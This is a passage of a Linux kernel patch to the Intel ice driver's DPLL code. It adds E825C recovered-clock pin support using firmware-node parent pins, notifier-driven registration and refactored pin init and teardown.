+ */ +static void +ice_dpll_pin_store_state(struct ice_dpll_pin *pin, int parent, bool state) +{ + pin->state[parent] = state ? 
DPLL_PIN_STATE_CONNECTED : + DPLL_PIN_STATE_DISCONNECTED; +} + +/** + * ice_dpll_rclk_update_e825c - updates the state of rclk pin on e825c device + * @pf: private board struct + * @pin: pointer to a pin + * + * Update struct holding pin states info, states are separate for each parent + * + * Context: Called under pf->dplls.lock + * Return: + * * 0 - OK + * * negative - error + */ +static int ice_dpll_rclk_update_e825c(struct ice_pf *pf, + struct ice_dpll_pin *pin) +{ + u8 rclk_bits; + int err; + u32 reg; + + if (pf->dplls.rclk.num_parents > ICE_SYNCE_CLK_NUM) + return -EINVAL; + + err = ice_read_cgu_reg(&pf->hw, ICE_CGU_R10, &reg); + if (err) + return err; + + rclk_bits = FIELD_GET(ICE_CGU_R10_SYNCE_S_REF_CLK, reg); + ice_dpll_pin_store_state(pin, ICE_SYNCE_CLK0, rclk_bits == + (pf->ptp.port.port_num + ICE_CGU_BYPASS_MUX_OFFSET_E825C)); + + err = ice_read_cgu_reg(&pf->hw, ICE_CGU_R11, &reg); + if (err) + return err; + + rclk_bits = FIELD_GET(ICE_CGU_R11_SYNCE_S_BYP_CLK, reg); + ice_dpll_pin_store_state(pin, ICE_SYNCE_CLK1, rclk_bits == + (pf->ptp.port.port_num + ICE_CGU_BYPASS_MUX_OFFSET_E825C)); + + return 0; +} + +/** + * ice_dpll_rclk_update - updates the state of rclk pin on a device + * @pf: private board struct + * @pin: pointer to a pin + * @port_num: port number + * + * Update struct holding pin states info, states are separate for each parent + * + * Context: Called under pf->dplls.lock + * Return: + * * 0 - OK + * * negative - error + */ +static int ice_dpll_rclk_update(struct ice_pf *pf, struct ice_dpll_pin *pin, + u8 port_num) +{ + int ret; + + for (u8 parent = 0; parent < pf->dplls.rclk.num_parents; parent++) { + ret = ice_aq_get_phy_rec_clk_out(&pf->hw, &parent, &port_num, + &pin->flags[parent], NULL); + if (ret) + return ret; + + ice_dpll_pin_store_state(pin, parent, + ICE_AQC_GET_PHY_REC_CLK_OUT_OUT_EN & + pin->flags[parent]); + } + + return 0; +} + /** * ice_dpll_sw_pins_update - update status of all SW pins * @pf: private board struct @@ -668,22 
+755,14 @@ ice_dpll_pin_state_update(struct ice_pf *pf, struct ice_dpll_pin *pin, } break; case ICE_DPLL_PIN_TYPE_RCLK_INPUT: - for (parent = 0; parent < pf->dplls.rclk.num_parents; - parent++) { - u8 p = parent; - - ret = ice_aq_get_phy_rec_clk_out(&pf->hw, &p, - &port_num, - &pin->flags[parent], - NULL); + if (pf->hw.mac_type == ICE_MAC_GENERIC_3K_E825) { + ret = ice_dpll_rclk_update_e825c(pf, pin); + if (ret) + goto err; + } else { + ret = ice_dpll_rclk_update(pf, pin, port_num); if (ret) goto err; - if (ICE_AQC_GET_PHY_REC_CLK_OUT_OUT_EN & - pin->flags[parent]) - pin->state[parent] = DPLL_PIN_STATE_CONNECTED; - else - pin->state[parent] = - DPLL_PIN_STATE_DISCONNECTED; } break; case ICE_DPLL_PIN_TYPE_SOFTWARE: @@ -1842,6 +1921,40 @@ ice_dpll_phase_offset_get(const struct dpll_pin *pin, void *pin_priv, return 0; } +/** + * ice_dpll_synce_update_e825c - set PHY recovered clock pins on e825c + * @hw: Pointer to the HW struct + * @ena: true to enable, false to disable + * @port_num: port number + * @output: output pin, we have two in E825C + * + * DPLL subsystem callback. Set proper signals to recover clock from port. 
+ * + * Context: Called under pf->dplls.lock + * Return: + * * 0 - success + * * negative - error + */ +static int ice_dpll_synce_update_e825c(struct ice_hw *hw, bool ena, + u32 port_num, enum ice_synce_clk output) +{ + int err; + + /* configure the mux to deliver proper signal to DPLL from the MUX */ + err = ice_tspll_cfg_bypass_mux_e825c(hw, ena, port_num, output); + if (err) + return err; + + err = ice_tspll_cfg_synce_ethdiv_e825c(hw, output); + if (err) + return err; + + dev_dbg(ice_hw_to_dev(hw), "CLK_SYNCE%u recovered clock: pin %s\n", + output, str_enabled_disabled(ena)); + + return 0; +} + /** * ice_dpll_output_esync_set - callback for setting embedded sync * @pin: pointer to a pin @@ -2263,6 +2376,28 @@ ice_dpll_sw_input_ref_sync_get(const struct dpll_pin *pin, void *pin_priv, state, extack); } +static int +ice_dpll_pin_get_parent_num(struct ice_dpll_pin *pin, + const struct dpll_pin *parent) +{ + int i; + + for (i = 0; i < pin->num_parents; i++) + if (pin->pf->dplls.inputs[pin->parent_idx[i]].pin == parent) + return i; + + return -ENOENT; +} + +static int +ice_dpll_pin_get_parent_idx(struct ice_dpll_pin *pin, + const struct dpll_pin *parent) +{ + int num = ice_dpll_pin_get_parent_num(pin, parent); + + return num < 0 ? 
num : pin->parent_idx[num]; +} + /** * ice_dpll_rclk_state_on_pin_set - set a state on rclk pin * @pin: pointer to a pin @@ -2286,35 +2421,44 @@ ice_dpll_rclk_state_on_pin_set(const struct dpll_pin *pin, void *pin_priv, enum dpll_pin_state state, struct netlink_ext_ack *extack) { - struct ice_dpll_pin *p = pin_priv, *parent = parent_pin_priv; bool enable = state == DPLL_PIN_STATE_CONNECTED; + struct ice_dpll_pin *p = pin_priv; struct ice_pf *pf = p->pf; + struct ice_hw *hw; int ret = -EINVAL; - u32 hw_idx; + int hw_idx; + + hw = &pf->hw; if (ice_dpll_is_reset(pf, extack)) return -EBUSY; mutex_lock(&pf->dplls.lock); - hw_idx = parent->idx - pf->dplls.base_rclk_idx; - if (hw_idx >= pf->dplls.num_inputs) + hw_idx = ice_dpll_pin_get_parent_idx(p, parent_pin); + if (hw_idx < 0) goto unlock; if ((enable && p->state[hw_idx] == DPLL_PIN_STATE_CONNECTED) || (!enable && p->state[hw_idx] == DPLL_PIN_STATE_DISCONNECTED)) { NL_SET_ERR_MSG_FMT(extack, "pin:%u state:%u on parent:%u already set", - p->idx, state, parent->idx); + p->idx, state, + ice_dpll_pin_get_parent_num(p, parent_pin)); goto unlock; } - ret = ice_aq_set_phy_rec_clk_out(&pf->hw, hw_idx, enable, - &p->freq); + + ret = hw->mac_type == ICE_MAC_GENERIC_3K_E825 ? 
+ ice_dpll_synce_update_e825c(hw, enable, + pf->ptp.port.port_num, + (enum ice_synce_clk)hw_idx) : + ice_aq_set_phy_rec_clk_out(hw, hw_idx, enable, &p->freq); if (ret) NL_SET_ERR_MSG_FMT(extack, "err:%d %s failed to set pin state:%u for pin:%u on parent:%u", ret, - libie_aq_str(pf->hw.adminq.sq_last_status), - state, p->idx, parent->idx); + libie_aq_str(hw->adminq.sq_last_status), + state, p->idx, + ice_dpll_pin_get_parent_num(p, parent_pin)); unlock: mutex_unlock(&pf->dplls.lock); @@ -2344,17 +2488,17 @@ ice_dpll_rclk_state_on_pin_get(const struct dpll_pin *pin, void *pin_priv, enum dpll_pin_state *state, struct netlink_ext_ack *extack) { - struct ice_dpll_pin *p = pin_priv, *parent = parent_pin_priv; + struct ice_dpll_pin *p = pin_priv; struct ice_pf *pf = p->pf; int ret = -EINVAL; - u32 hw_idx; + int hw_idx; if (ice_dpll_is_reset(pf, extack)) return -EBUSY; mutex_lock(&pf->dplls.lock); - hw_idx = parent->idx - pf->dplls.base_rclk_idx; - if (hw_idx >= pf->dplls.num_inputs) + hw_idx = ice_dpll_pin_get_parent_idx(p, parent_pin); + if (hw_idx < 0) goto unlock; ret = ice_dpll_pin_state_update(pf, p, ICE_DPLL_PIN_TYPE_RCLK_INPUT, @@ -2814,7 +2958,8 @@ static void ice_dpll_release_pins(struct ice_dpll_pin *pins, int count) int i; for (i = 0; i < count; i++) - dpll_pin_put(pins[i].pin, &pins[i].tracker); + if (!IS_ERR_OR_NULL(pins[i].pin)) + dpll_pin_put(pins[i].pin, &pins[i].tracker); } /** @@ -2836,10 +2981,14 @@ static int ice_dpll_get_pins(struct ice_pf *pf, struct ice_dpll_pin *pins, int start_idx, int count, u64 clock_id) { + u32 pin_index; int i, ret; for (i = 0; i < count; i++) { - pins[i].pin = dpll_pin_get(clock_id, i + start_idx, THIS_MODULE, + pin_index = start_idx; + if (start_idx != DPLL_PIN_IDX_UNSPEC) + pin_index += i; + pins[i].pin = dpll_pin_get(clock_id, pin_index, THIS_MODULE, &pins[i].prop, &pins[i].tracker); if (IS_ERR(pins[i].pin)) { ret = PTR_ERR(pins[i].pin); @@ -2944,6 +3093,7 @@ ice_dpll_register_pins(struct dpll_device *dpll, struct 
ice_dpll_pin *pins, /** * ice_dpll_deinit_direct_pins - deinitialize direct pins + * @pf: board private structure * @cgu: if cgu is present and controlled by this NIC * @pins: pointer to pins array * @count: number of pins @@ -2955,7 +3105,8 @@ ice_dpll_register_pins(struct dpll_device *dpll, struct ice_dpll_pin *pins, * Release pins resources to the dpll subsystem. */ static void -ice_dpll_deinit_direct_pins(bool cgu, struct ice_dpll_pin *pins, int count, +ice_dpll_deinit_direct_pins(struct ice_pf *pf, bool cgu, + struct ice_dpll_pin *pins, int count, const struct dpll_pin_ops *ops, struct dpll_device *first, struct dpll_device *second) @@ -3024,14 +3175,14 @@ static void ice_dpll_deinit_rclk_pin(struct ice_pf *pf) { struct ice_dpll_pin *rclk = &pf->dplls.rclk; struct ice_vsi *vsi = ice_get_main_vsi(pf); - struct dpll_pin *parent; + struct ice_dpll_pin *parent; int i; for (i = 0; i < rclk->num_parents; i++) { - parent = pf->dplls.inputs[rclk->parent_idx[i]].pin; - if (!parent) + parent = &pf->dplls.inputs[rclk->parent_idx[i]]; + if (IS_ERR_OR_NULL(parent->pin)) continue; - dpll_pin_on_pin_unregister(parent, rclk->pin, + dpll_pin_on_pin_unregister(parent->pin, rclk->pin, &ice_dpll_rclk_ops, rclk); } if (WARN_ON_ONCE(!vsi || !vsi->netdev)) @@ -3040,60 +3191,213 @@ static void ice_dpll_deinit_rclk_pin(struct ice_pf *pf) dpll_pin_put(rclk->pin, &rclk->tracker); } +static bool ice_dpll_is_fwnode_pin(struct ice_dpll_pin *pin) +{ + return !IS_ERR_OR_NULL(pin->fwnode); +} + +static void ice_dpll_pin_notify_work(struct work_struct *work) +{ + struct ice_dpll_pin_work *w = container_of(work, + struct ice_dpll_pin_work, + work); + struct ice_dpll_pin *pin, *parent = w->pin; + struct ice_pf *pf = parent->pf; + int ret; + + wait_for_completion(&pf->dplls.dpll_init); + if (!test_bit(ICE_FLAG_DPLL, pf->flags)) + return; /* DPLL initialization failed */ + + switch (w->action) { + case DPLL_PIN_CREATED: + if (!IS_ERR_OR_NULL(parent->pin)) { + /* We have already our pin registered 
*/ + goto out; + } + + /* Grab reference on fwnode pin */ + parent->pin = fwnode_dpll_pin_find(parent->fwnode, + &parent->tracker); + if (IS_ERR_OR_NULL(parent->pin)) { + dev_err(ice_pf_to_dev(pf), + "Cannot get fwnode pin reference\n"); + goto out; + } + + /* Register rclk pin */ + pin = &pf->dplls.rclk; + ret = dpll_pin_on_pin_register(parent->pin, pin->pin, + &ice_dpll_rclk_ops, pin); + if (ret) { + dev_err(ice_pf_to_dev(pf), + "Failed to register pin: %pe\n", ERR_PTR(ret)); + dpll_pin_put(parent->pin, &parent->tracker); + parent->pin = NULL; + goto out; + } + break; + case DPLL_PIN_DELETED: + if (IS_ERR_OR_NULL(parent->pin)) { + /* We have already our pin unregistered */ + goto out; + } + + /* Unregister rclk pin */ + pin = &pf->dplls.rclk; + dpll_pin_on_pin_unregister(parent->pin, pin->pin, + &ice_dpll_rclk_ops, pin); + + /* Drop fwnode pin reference */ + dpll_pin_put(parent->pin, &parent->tracker); + parent->pin = NULL; + break; + default: + break; + } +out: + kfree(w); +} + +static int ice_dpll_pin_notify(struct notifier_block *nb, unsigned long action, + void *data) +{ + struct ice_dpll_pin *pin = container_of(nb, struct ice_dpll_pin, nb); + struct dpll_pin_notifier_info *info = data; + struct ice_dpll_pin_work *work; + + if (action != DPLL_PIN_CREATED && action != DPLL_PIN_DELETED) + return NOTIFY_DONE; + + /* Check if the reported pin is this one */ + if (pin->fwnode != info->fwnode) + return NOTIFY_DONE; /* Not this pin */ + + work = kzalloc(sizeof(*work), GFP_KERNEL); + if (!work) + return NOTIFY_DONE; + + INIT_WORK(&work->work, ice_dpll_pin_notify_work); + work->action = action; + work->pin = pin; + + queue_work(pin->pf->dplls.wq, &work->work); + + return NOTIFY_OK; +} + /** - * ice_dpll_init_rclk_pins - initialize recovered clock pin + * ice_dpll_init_pin_common - initialize pin * @pf: board private structure * @pin: pin to register * @start_idx: on which index shall allocation start in dpll subsystem * @ops: callback ops registered with the pins * - 
* Allocate resource for recovered clock pin in dpll subsystem. Register the - * pin with the parents it has in the info. Register pin with the pf's main vsi - * netdev. + * Allocate resource for given pin in dpll subsystem. Register the pin with + * the parents it has in the info. * * Return: * * 0 - success * * negative - registration failure reason */ static int -ice_dpll_init_rclk_pins(struct ice_pf *pf, struct ice_dpll_pin *pin, - int start_idx, const struct dpll_pin_ops *ops) +ice_dpll_init_pin_common(struct ice_pf *pf, struct ice_dpll_pin *pin, + int start_idx, const struct dpll_pin_ops *ops) { - struct ice_vsi *vsi = ice_get_main_vsi(pf); - struct dpll_pin *parent; + struct ice_dpll_pin *parent; int ret, i; - if (WARN_ON((!vsi || !vsi->netdev))) - return -EINVAL; - ret = ice_dpll_get_pins(pf, pin, start_idx, ICE_DPLL_RCLK_NUM_PER_PF, - pf->dplls.clock_id); + ret = ice_dpll_get_pins(pf, pin, start_idx, 1, pf->dplls.clock_id); if (ret) return ret; - for (i = 0; i < pf->dplls.rclk.num_parents; i++) { - parent = pf->dplls.inputs[pf->dplls.rclk.parent_idx[i]].pin; - if (!parent) { - ret = -ENODEV; - goto unregister_pins; + + for (i = 0; i < pin->num_parents; i++) { + parent = &pf->dplls.inputs[pin->parent_idx[i]]; + if (IS_ERR_OR_NULL(parent->pin)) { + if (!ice_dpll_is_fwnode_pin(parent)) { + ret = -ENODEV; + goto unregister_pins; + } + parent->pin = fwnode_dpll_pin_find(parent->fwnode, + &parent->tracker); + if (IS_ERR_OR_NULL(parent->pin)) { + dev_info(ice_pf_to_dev(pf), + "Mux pin not registered yet\n"); + continue; + } } - ret = dpll_pin_on_pin_register(parent, pf->dplls.rclk.pin, - ops, &pf->dplls.rclk); + ret = dpll_pin_on_pin_register(parent->pin, pin->pin, ops, pin); if (ret) goto unregister_pins; } - dpll_netdev_pin_set(vsi->netdev, pf->dplls.rclk.pin); return 0; unregister_pins: while (i) { - parent = pf->dplls.inputs[pf->dplls.rclk.parent_idx[--i]].pin; - dpll_pin_on_pin_unregister(parent, pf->dplls.rclk.pin, - &ice_dpll_rclk_ops, &pf->dplls.rclk); + 
parent = &pf->dplls.inputs[pin->parent_idx[--i]]; + if (IS_ERR_OR_NULL(parent->pin)) + continue; + dpll_pin_on_pin_unregister(parent->pin, pin->pin, ops, pin); } - ice_dpll_release_pins(pin, ICE_DPLL_RCLK_NUM_PER_PF); + ice_dpll_release_pins(pin, 1); + return ret; } +/** + * ice_dpll_init_rclk_pin - initialize recovered clock pin + * @pf: board private structure + * @start_idx: on which index shall allocation start in dpll subsystem + * @ops: callback ops registered with the pins + * + * Allocate resource for recovered clock pin in dpll subsystem. Register the + * pin with the parents it has in the info. + * + * Return: + * * 0 - success + * * negative - registration failure reason + */ +static int +ice_dpll_init_rclk_pin(struct ice_pf *pf, int start_idx, + const struct dpll_pin_ops *ops) +{ + struct ice_vsi *vsi = ice_get_main_vsi(pf); + int ret; + + ret = ice_dpll_init_pin_common(pf, &pf->dplls.rclk, start_idx, ops); + if (ret) + return ret; + + dpll_netdev_pin_set(vsi->netdev, pf->dplls.rclk.pin); + + return 0; +} + +static void +ice_dpll_deinit_fwnode_pin(struct ice_dpll_pin *pin) +{ + unregister_dpll_notifier(&pin->nb); + flush_workqueue(pin->pf->dplls.wq); + if (!IS_ERR_OR_NULL(pin->pin)) { + dpll_pin_put(pin->pin, &pin->tracker); + pin->pin = NULL; + } + fwnode_handle_put(pin->fwnode); + pin->fwnode = NULL; +} + +static void +ice_dpll_deinit_fwnode_pins(struct ice_pf *pf, struct ice_dpll_pin *pins, + int start_idx) +{ + int i; + + for (i = 0; i < pf->dplls.rclk.num_parents; i++) + ice_dpll_deinit_fwnode_pin(&pins[start_idx + i]); + destroy_workqueue(pf->dplls.wq); +} + /** * ice_dpll_deinit_pins - deinitialize direct pins * @pf: board private structure @@ -3113,6 +3417,8 @@ static void ice_dpll_deinit_pins(struct ice_pf *pf, bool cgu) struct ice_dpll *dp = &d->pps; ice_dpll_deinit_rclk_pin(pf); + if (pf->hw.mac_type == ICE_MAC_GENERIC_3K_E825) + ice_dpll_deinit_fwnode_pins(pf, pf->dplls.inputs, 0); if (cgu) { ice_dpll_unregister_pins(dp->dpll, inputs, 
&ice_dpll_input_ops, num_inputs); @@ -3127,12 +3433,12 @@ static void ice_dpll_deinit_pins(struct ice_pf *pf, bool cgu) &ice_dpll_output_ops, num_outputs); ice_dpll_release_pins(outputs, num_outputs); if (!pf->dplls.generic) { - ice_dpll_deinit_direct_pins(cgu, pf->dplls.ufl, + ice_dpll_deinit_direct_pins(pf, cgu, pf->dplls.ufl, ICE_DPLL_PIN_SW_NUM, &ice_dpll_pin_ufl_ops, pf->dplls.pps.dpll, pf->dplls.eec.dpll); - ice_dpll_deinit_direct_pins(cgu, pf->dplls.sma, + ice_dpll_deinit_direct_pins(pf, cgu, pf->dplls.sma, ICE_DPLL_PIN_SW_NUM, &ice_dpll_pin_sma_ops, pf->dplls.pps.dpll, @@ -3141,6 +3447,141 @@ static void ice_dpll_deinit_pins(struct ice_pf *pf, bool cgu) } } +static struct fwnode_handle * +ice_dpll_pin_node_get(struct ice_pf *pf, const char *name) +{ + struct fwnode_handle *fwnode = dev_fwnode(ice_pf_to_dev(pf)); + int index; + + index = fwnode_property_match_string(fwnode, "dpll-pin-names", name); + if (index < 0) + return ERR_PTR(-ENOENT); + + return fwnode_find_reference(fwnode, "dpll-pins", index); +} + +static int +ice_dpll_init_fwnode_pin(struct ice_dpll_pin *pin, const char *name) +{ + struct ice_pf *pf = pin->pf; + int ret; + + pin->fwnode = ice_dpll_pin_node_get(pf, name); + if (IS_ERR(pin->fwnode)) { + dev_err(ice_pf_to_dev(pf), + "Failed to find %s firmware node: %pe\n", name, + pin->fwnode); + pin->fwnode = NULL; + return -ENODEV; + } + + dev_dbg(ice_pf_to_dev(pf), "Found fwnode node for %s\n", name); + + pin->pin = fwnode_dpll_pin_find(pin->fwnode, &pin->tracker); + if (IS_ERR_OR_NULL(pin->pin)) { + dev_info(ice_pf_to_dev(pf), + "DPLL pin for %pfwp not registered yet\n", + pin->fwnode); + pin->pin = NULL; + } + + pin->nb.notifier_call = ice_dpll_pin_notify; + ret = register_dpll_notifier(&pin->nb); + if (ret) { + dev_err(ice_pf_to_dev(pf), + "Failed to subscribe for DPLL notifications\n"); + + if (!IS_ERR_OR_NULL(pin->pin)) { + dpll_pin_put(pin->pin, &pin->tracker); + pin->pin = NULL; + } + fwnode_handle_put(pin->fwnode); + pin->fwnode = NULL; + 
+ return ret; + } + + return ret; +} + +/** + * ice_dpll_init_fwnode_pins - initialize pins from firmware nodes + * @pf: board private structure + * @pins: pointer to pins array + * @start_idx: starting index for pins + * + * Initialize input pins for E825 RCLK support. The parent pins (rclk0, rclk1) + * are expected to be defined by the system firmware (ACPI). This function + * allocates them in the dpll subsystem and stores their indices for later + * registration with the rclk pin. + * + * Return: + * * 0 - success + * * negative - initialization failure reason + */ +static int +ice_dpll_init_fwnode_pins(struct ice_pf *pf, struct ice_dpll_pin *pins, + int start_idx) +{ + char pin_name[8]; + int i, ret; + + pf->dplls.wq = create_singlethread_workqueue("ice_dpll_wq"); + if (!pf->dplls.wq) + return -ENOMEM; + + for (i = 0; i < pf->dplls.rclk.num_parents; i++) { + pins[start_idx + i].pf = pf; + snprintf(pin_name, sizeof(pin_name), "rclk%u", i); + ret = ice_dpll_init_fwnode_pin(&pins[start_idx + i], pin_name); + if (ret) + goto error; + } + + return 0; +error: + while (i--) + ice_dpll_deinit_fwnode_pin(&pins[start_idx + i]); + + destroy_workqueue(pf->dplls.wq); + + return ret; +} + +/** + * ice_dpll_init_pins_e825 - init pins and register pins with a dplls + * @pf: board private structure + * + * Initialize the firmware-described parent pins and the pf's rclk pin within + * the Linux dpll subsystem. + * + * Return: + * * 0 - success + * * negative - initialization failure reason + */ +static int ice_dpll_init_pins_e825(struct ice_pf *pf) +{ + int ret; + + ret = ice_dpll_init_fwnode_pins(pf, pf->dplls.inputs, 0); + if (ret) + return ret; + + ret = ice_dpll_init_rclk_pin(pf, DPLL_PIN_IDX_UNSPEC, + &ice_dpll_rclk_ops); + if (ret) { + /* Inform DPLL notifier works that DPLL init was finished + * unsuccessfully (ICE_FLAG_DPLL not set). 
+ */ + complete_all(&pf->dplls.dpll_init); + ice_dpll_deinit_fwnode_pins(pf, pf->dplls.inputs, 0); + } + + return ret; +} + /** * ice_dpll_init_pins - init pins and register pins with a dplls * @pf: board private structure @@ -3155,21 +3596,24 @@ static void ice_dpll_deinit_pins(struct ice_pf *pf, bool cgu) */ static int ice_dpll_init_pins(struct ice_pf *pf, bool cgu) { + const struct dpll_pin_ops *output_ops; + const struct dpll_pin_ops *input_ops; int ret, count; + input_ops = &ice_dpll_input_ops; + output_ops = &ice_dpll_output_ops; + ret = ice_dpll_init_direct_pins(pf, cgu, pf->dplls.inputs, 0, - pf->dplls.num_inputs, - &ice_dpll_input_ops, - pf->dplls.eec.dpll, pf->dplls.pps.dpll); + pf->dplls.num_inputs, input_ops, + pf->dplls.eec.dpll, + pf->dplls.pps.dpll); if (ret) return ret; count = pf->dplls.num_inputs; if (cgu) { ret = ice_dpll_init_direct_pins(pf, cgu, pf->dplls.outputs, - count, - pf->dplls.num_outputs, - &ice_dpll_output_ops, - pf->dplls.eec.dpll, + count, pf->dplls.num_outputs, + output_ops, pf->dplls.eec.dpll, pf->dplls.pps.dpll); if (ret) goto deinit_inputs; @@ -3205,30 +3649,30 @@ static int ice_dpll_init_pins(struct ice_pf *pf, bool cgu) } else { count += pf->dplls.num_outputs + 2 * ICE_DPLL_PIN_SW_NUM; } - ret = ice_dpll_init_rclk_pins(pf, &pf->dplls.rclk, count + pf->hw.pf_id, - &ice_dpll_rclk_ops); + + ret = ice_dpll_init_rclk_pin(pf, count + pf->ptp.port.port_num, + &ice_dpll_rclk_ops); if (ret) goto deinit_ufl; return 0; deinit_ufl: - ice_dpll_deinit_direct_pins(cgu, pf->dplls.ufl, - ICE_DPLL_PIN_SW_NUM, - &ice_dpll_pin_ufl_ops, - pf->dplls.pps.dpll, pf->dplls.eec.dpll); + ice_dpll_deinit_direct_pins(pf, cgu, pf->dplls.ufl, ICE_DPLL_PIN_SW_NUM, + &ice_dpll_pin_ufl_ops, pf->dplls.pps.dpll, + pf->dplls.eec.dpll); deinit_sma: - ice_dpll_deinit_direct_pins(cgu, pf->dplls.sma, - ICE_DPLL_PIN_SW_NUM, - &ice_dpll_pin_sma_ops, - pf->dplls.pps.dpll, pf->dplls.eec.dpll); + ice_dpll_deinit_direct_pins(pf, cgu, pf->dplls.sma, ICE_DPLL_PIN_SW_NUM, + 
&ice_dpll_pin_sma_ops, pf->dplls.pps.dpll, + pf->dplls.eec.dpll); deinit_outputs: - ice_dpll_deinit_direct_pins(cgu, pf->dplls.outputs, + ice_dpll_deinit_direct_pins(pf, cgu, pf->dplls.outputs, pf->dplls.num_outputs, - &ice_dpll_output_ops, pf->dplls.pps.dpll, + output_ops, pf->dplls.pps.dpll, pf->dplls.eec.dpll); deinit_inputs: - ice_dpll_deinit_direct_pins(cgu, pf->dplls.inputs, pf->dplls.num_inputs, - &ice_dpll_input_ops, pf->dplls.pps.dpll, + ice_dpll_deinit_direct_pins(pf, cgu, pf->dplls.inputs, + pf->dplls.num_inputs, + input_ops, pf->dplls.pps.dpll, pf->dplls.eec.dpll); return ret; } @@ -3239,8 +3683,8 @@ static int ice_dpll_init_pins(struct ice_pf *pf, bool cgu) * @d: pointer to ice_dpll * @cgu: if cgu is present and controlled by this NIC * - * If cgu is owned unregister the dpll from dpll subsystem. - * Release resources of dpll device from dpll subsystem. + * If cgu is owned, unregister the DPLL from DPLL subsystem. + * Release resources of DPLL device from DPLL subsystem. */ static void ice_dpll_deinit_dpll(struct ice_pf *pf, struct ice_dpll *d, bool cgu) @@ -3257,8 +3701,8 @@ ice_dpll_deinit_dpll(struct ice_pf *pf, struct ice_dpll *d, bool cgu) * @cgu: if cgu is present and controlled by this NIC * @type: type of dpll being initialized * - * Allocate dpll instance for this board in dpll subsystem, if cgu is controlled - * by this NIC, register dpll with the callback ops. + * Allocate DPLL instance for this board in dpll subsystem, if cgu is controlled + * by this NIC, register DPLL with the callback ops. 
* * Return: * * 0 - success @@ -3289,6 +3733,7 @@ ice_dpll_init_dpll(struct ice_pf *pf, struct ice_dpll *d, bool cgu, ret = dpll_device_register(d->dpll, type, ops, d); if (ret) { dpll_device_put(d->dpll, &d->tracker); + d->dpll = NULL; return ret; } d->ops = ops; @@ -3506,6 +3951,26 @@ ice_dpll_init_info_direct_pins(struct ice_pf *pf, return ret; } +/** + * ice_dpll_init_info_pin_on_pin_e825c - initializes rclk pin information + * @pf: board private structure + * + * Init information for rclk pin, cache them in pf->dplls.rclk. + * + * Return: + * * 0 - success + */ +static int ice_dpll_init_info_pin_on_pin_e825c(struct ice_pf *pf) +{ + struct ice_dpll_pin *rclk_pin = &pf->dplls.rclk; + + rclk_pin->prop.type = DPLL_PIN_TYPE_SYNCE_ETH_PORT; + rclk_pin->prop.capabilities |= DPLL_PIN_CAPABILITIES_STATE_CAN_CHANGE; + rclk_pin->pf = pf; + + return 0; +} + /** * ice_dpll_init_info_rclk_pin - initializes rclk pin information * @pf: board private structure @@ -3632,7 +4097,10 @@ ice_dpll_init_pins_info(struct ice_pf *pf, enum ice_dpll_pin_type pin_type) case ICE_DPLL_PIN_TYPE_OUTPUT: return ice_dpll_init_info_direct_pins(pf, pin_type); case ICE_DPLL_PIN_TYPE_RCLK_INPUT: - return ice_dpll_init_info_rclk_pin(pf); + if (pf->hw.mac_type == ICE_MAC_GENERIC_3K_E825) + return ice_dpll_init_info_pin_on_pin_e825c(pf); + else + return ice_dpll_init_info_rclk_pin(pf); case ICE_DPLL_PIN_TYPE_SOFTWARE: return ice_dpll_init_info_sw_pins(pf); default: @@ -3654,6 +4122,50 @@ static void ice_dpll_deinit_info(struct ice_pf *pf) kfree(pf->dplls.pps.input_prio); } +/** + * ice_dpll_init_info_e825c - prepare pf's dpll information structure for e825c + * device + * @pf: board private structure + * + * Acquire (from HW) and set basic DPLL information (on pf->dplls struct). 
+ * + * Return: + * * 0 - success + * * negative - init failure reason + */ +static int ice_dpll_init_info_e825c(struct ice_pf *pf) +{ + struct ice_dplls *d = &pf->dplls; + int ret = 0; + int i; + + d->clock_id = ice_generate_clock_id(pf); + d->num_inputs = ICE_SYNCE_CLK_NUM; + + d->inputs = kcalloc(d->num_inputs, sizeof(*d->inputs), GFP_KERNEL); + if (!d->inputs) + return -ENOMEM; + + ret = ice_get_cgu_rclk_pin_info(&pf->hw, &d->base_rclk_idx, + &pf->dplls.rclk.num_parents); + if (ret) + goto deinit_info; + + for (i = 0; i < pf->dplls.rclk.num_parents; i++) + pf->dplls.rclk.parent_idx[i] = d->base_rclk_idx + i; + + ret = ice_dpll_init_pins_info(pf, ICE_DPLL_PIN_TYPE_RCLK_INPUT); + if (ret) + goto deinit_info; + dev_dbg(ice_pf_to_dev(pf), + "%s - success, inputs: %u, outputs: %u, rclk-parents: %u\n", + __func__, d->num_inputs, d->num_outputs, d->rclk.num_parents); + return 0; +deinit_info: + ice_dpll_deinit_info(pf); + return ret; +} + /** * ice_dpll_init_info - prepare pf's dpll information structure * @pf: board private structure @@ -3773,14 +4285,16 @@ void ice_dpll_deinit(struct ice_pf *pf) ice_dpll_deinit_worker(pf); ice_dpll_deinit_pins(pf, cgu); - ice_dpll_deinit_dpll(pf, &pf->dplls.pps, cgu); - ice_dpll_deinit_dpll(pf, &pf->dplls.eec, cgu); + if (!IS_ERR_OR_NULL(pf->dplls.pps.dpll)) + ice_dpll_deinit_dpll(pf, &pf->dplls.pps, cgu); + if (!IS_ERR_OR_NULL(pf->dplls.eec.dpll)) + ice_dpll_deinit_dpll(pf, &pf->dplls.eec, cgu); ice_dpll_deinit_info(pf); mutex_destroy(&pf->dplls.lock); } /** - * ice_dpll_init - initialize support for dpll subsystem + * ice_dpll_init_e825 - initialize support for dpll subsystem * @pf: board private structure * * Set up the device dplls, register them and pins connected within Linux dpll @@ -3789,7 +4303,43 @@ void ice_dpll_deinit(struct ice_pf *pf) * * Context: Initializes pf->dplls.lock mutex. 
*/ -void ice_dpll_init(struct ice_pf *pf) +static void ice_dpll_init_e825(struct ice_pf *pf) +{ + struct ice_dplls *d = &pf->dplls; + int err; + + mutex_init(&d->lock); + init_completion(&d->dpll_init); + + err = ice_dpll_init_info_e825c(pf); + if (err) + goto err_exit; + err = ice_dpll_init_pins_e825(pf); + if (err) + goto deinit_info; + set_bit(ICE_FLAG_DPLL, pf->flags); + complete_all(&d->dpll_init); + + return; + +deinit_info: + ice_dpll_deinit_info(pf); +err_exit: + mutex_destroy(&d->lock); + dev_warn(ice_pf_to_dev(pf), "DPLLs init failure err:%d\n", err); +} + +/** + * ice_dpll_init_e810 - initialize support for dpll subsystem + * @pf: board private structure + * + * Set up the device dplls, register them and pins connected within Linux dpll + * subsystem. Allow userspace to obtain state of DPLL and handling of DPLL + * configuration requests. + * + * Context: Initializes pf->dplls.lock mutex. + */ +static void ice_dpll_init_e810(struct ice_pf *pf) { bool cgu = ice_is_feature_supported(pf, ICE_F_CGU); struct ice_dplls *d = &pf->dplls; @@ -3829,3 +4379,15 @@ void ice_dpll_init(struct 